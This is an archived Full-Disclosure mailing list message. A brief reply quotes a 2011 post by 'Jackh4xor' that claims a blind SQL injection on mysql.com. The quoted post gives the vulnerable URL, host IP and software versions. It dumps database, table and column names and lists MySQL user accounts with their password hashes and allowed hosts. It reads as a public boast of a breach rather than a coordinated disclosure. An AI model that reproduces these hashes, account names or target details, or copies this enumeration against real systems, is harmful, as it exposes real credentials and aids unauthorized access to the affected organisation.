lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 27 Mar 2011 12:54:53 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: Jack haxor <jackh4xor@...ky0u.org>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: MySQL.com Vulnerable To Blind SQL Injection
	Vulnerability

lmao.

Was this accomplished using standard pattern from sqlmap, or did you make
your own?

On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor <jackh4xor@...ky0u.org> wrote:

>
>
> ---------------------------------------------------------------------------------------
> [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
> [+] Author: Jackh4xor @ w4ck1ng
> [+] Site: http://www.jackh4xor.com
>
> ---------------------------------------------------------------------------------------
>
> About MySQL.com :
>
> --------------------------------------------------------------------------------------------------------------------
>
> The Mysql website offers database software, services and support for your
> business, including the Enterprise server, the Network monitoring and
> advisory services and the production support. The wide range of products
> include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net,
> visual database tools (query browser, migration toolkit) and last but not
> least the MaxDB- the open source database certified for SAP/R3. The Mysql
> services are also made available for you. Choose among the Mysql training
> for database solutions, Mysql certification for the Developers and DBAs,
> Mysql consulting and support. It makes no difference if you are new in the
> database technology or a skilled developer of DBA, Mysql proposes services
> of all sorts for their customers.
>
> --------------------------------------------------------------------------------------------------------------------
>
>
>
> Vulnerable Target  :   http://mysql.com/customers/view/index.html?id=1170
> Host IP                  :   213.136.52.29
> Web Server           :   Apache/2.2.15 (Fedora)
> Powered-by           :   PHP/5.2.13
> Injection Type        :   MySQL Blind
> Current DB             :   web
>
> Data Bases:
>
> information_schema
> bk
> certification
> c?ashme
> cust_sync_interim
> customer
> dbasavings
> downloads
> feedback
> glassfish_interface
> intranet
> kaj
> license_customers
> manual
> manual_search
> mem
> mysql
> mysqlforge
> mysqlweb
> news_events
> partner_t?aining
> partners
> partners_bak
> phorum5
> planetmysql
> qa_contribution
> quickpoll
> robin
> rp
> sampo
> sampo_interface
> sessions
> softrax
> softrax_interim
> solutions
> tco
> test
> track
> track_refer
> wb
> web
> web_control
> web_projects
> web_training
> webwiki
> wordpress
> zack
>
> Current DB: web
>
> Tables
>
> xing_validation
> v_web_submissions
> userbk
> user_extra
>
> user  Columns: cwpid version lead_quality sfid industry address2 created
> last_modified lang notify newsletter gid title fax cell phone country
> zipcode state city address business company position lastname firstname
> passwd verified bounces email user_id
>
> us_zip_state
> us_area_state
> unsub_log
> trials
> trial_external_log
> trial_data
> trial_alias
> training_redirect
> tag_blacklist
> tag_applied
> tag
> support_feeds_DROP
> support_entries_DROP
> states
> snapshots_builds
> snapshots
> sakilapoints
> regions
> quote_customer
> quote
> quicklinks
> promo
> product_releases
> position
> partner
> paper_lead
> paper_details_options
> paper_details_old
> paper_details
> paper
> newsletter_unsub
> nav_sites
> nav_items
> mysql_history
> mirror_status
> mirror_country
> mirror_continent
> mirror
> mailing_list_member
> mailing_list
> locks
> lead_validity_rules
> lead_source_xref
> lead_source_external
> lead_source
> lead_routing_rule
> lead_rep
> lead_old
> lead_note
> lead_extra_old
> lead_extra_new
> lead_extra
> lead_companies
> lead_campaign_member
> lead
> language_strings
> language_modules
> imagecache
> hall_of_fame
> g_search_term
> g_search_data
> g_blog_data
> forum_comment
> forms
> field_xref
> field_options
> field_match
> email_blacklist
> email_a_friend
> drpl_manual_review
> drpl_denied
> drpl_check_log
> drpl_cache
> customer_meta_sets
> customer_meta_set
> customer_meta
> customer
> coupon_product
> coupon_campaign_attribute
> coupon_campaign
> coupon
> country
> countries
> campaign_type
> campaign_topic
> campaign_score
> campaign_listdata
> campaign_detail
> business
> bounces
>
> Database : mysql
> Table:
>
> user_info
>
> user     Column: Update_pri Insert_priv Select_priv Password User Host
>
> time_zone_transition_type
> time_zone_transition
> time_zone_name
> time_zone_leap_second
> time_zone
> tables_priv
> slow_log
> ?ervers
> procs_priv
> proc
> plugin
> ndb_binlog_index
> inventory
> host
> help_topic
> help_relation
> help_keyword
> help_category
> general_log
> func
> event
> db
> columns_priv
>
>
> # mysql.user Data
>
> Password                                      User            Host
>                                                 wembaster     %
>                                             monitor     10.%
>                                             sys             %
>                                             sys             localhost
> *06581D0A5474DFF4D5DA3CE0CD7702FA52601412     forumread     %
> *0702AEBF8E92A002E95D40247776E1A67CD2CA3F     wb             %
> *2A57F767D29295B3CB8D01C760D9939649483F85     flipper     10.%
> *32F623705BFFFE682E7BD18D5357B38EF8A5BAA9     wordpress     %
> *66A905D4110DF14B41D585FDBCE0666AD13DD8C1     nagios             %
> *704EB56151317F27573BB4DDA98EDF00FFABAAF8     root             localhost
> *ED1BDC19B08FD41017EE180169E5CEB2C77F941A     mysqlforge     %
> *FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B     webleads     10.%
> 00680dd718880337                             olof             %
> 077f61a849269b62     qa_r     %
> 077f61a849269b62     qa_rw     %
> 077f61a849269b62     qa_adm     %
> 0c2f46ba6b87d4ea     trials_admin     10.%
> 1856b9b03b5a6f47     cacti     %
> 19519e95545509b5     certification     %
> 1a39dcad63bbc7a6     gf_mschiff     %
> 2277fd7d562ec459     webslave     localhost
> 2277fd7d562ec459     webslave     %
> 304404b114b5516c     planetmysql_rw     %
> 35e376451a87adb0     planetmysql_ro     %
> 4e203d581b756a93     webmaster     localhost
> 4e203d581b756a93     webmaster     %
> 4e93479179a8ec93     sysadm     %
> 575ec47e16c7e20e     phorum5     %
> 575ec47e16c7e20e     lenz     %
> 5f340ec40a706f64     robin     %
> 61113da02d2c97a5     regdata     %
> 616075f256f111ba     myadmin     10.100.6.44
> 61711eea3de509ac     merlin     127.0.0.1
> 6302de0909a369a1     ebraswell     %
> 6b72b2824cc7f6fe     mysqlweb     %
> 6ffd2b17498cdd44     zack     %
> 70599cf351c6f591     repl     %
> 740284817e3ed5a8     webwiki     %
> 74c5529b41a97cc2     web_projects
>
> Databsae: web_control
>
> Table:
> system
> system_command
> service_request
> run_control
> request_daemon
> rebuild_server
> rebuild_queue
> rebuild_control
> quarterly_lead_report
> newsletter_log
> newsletter_control
> ips
> hosts  Columns:notes description name
> dns_servers Columns: name internal ip
>
>
> Database: certification
>
> Tables:
> signup
> corpcustomers
> certexamdata
> certcandidatedata
> certaccess
>
>
> Database: wordpress
>
> Tables:
>
> wp_4_term_taxonom
> wp_4_term_relationships
> wp_4_posts
> wp_4_postmeta
> wp_4_options
> wp_4_links
> wp_4_comments
> wp_3_terms
> wp_3_term_taxonomy
> wp_3_term_relationships
> wp_3_posts
> wp_3_postmeta
> wp_3_options
> wp_3_links
> wp_3_comments
> wp_2_terms
> wp_2_term_taxonomy
> wp_2_term_relationships
> wp_2_posts
> wp_2_postmeta
> wp_2_options
> wp_2_links
> wp_2_comments
> wp_1_terms
> wp_1_term_taxonomy
> wp_1_term_relationships
> wp_1_posts
> wp_1_postmeta
> wp_1_options
> wp_1_links
> wp_1_comments
> wp_11_terms
> wp_11_term_taxonomy
> wp_11_term_relationships
> wp_11_posts
> wp_11_postmeta
> wp_11_options
> wp_11_links
> wp_11_comments
> wp_10_terms
> wp_10_term_taxonomy
> wp_10_term_relationships
> wp_10_posts
> wp_10_postmeta
> wp_10_options
> wp_10_links
> wp_10_comments
> remove_queries
>
>
>
> Database: bk
>
> Table:
> wp_backupterm_taxonomy
> wp_backupterm_relationships
> wp_backupposts
> wp_backuppostmeta
> wp_backupoptions
> wp_backuplinks
> wp_backupcomments
>
>
>
> -----------------------------------------------------------------------------------
> Signed : Jackh4xor ! [image: Smile]
>
> Greetz : rooto, Mr.52, zone-hacker, w4ck1ng
>
> (In)Security
>
> -------------------------------------------------------------------------------------
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ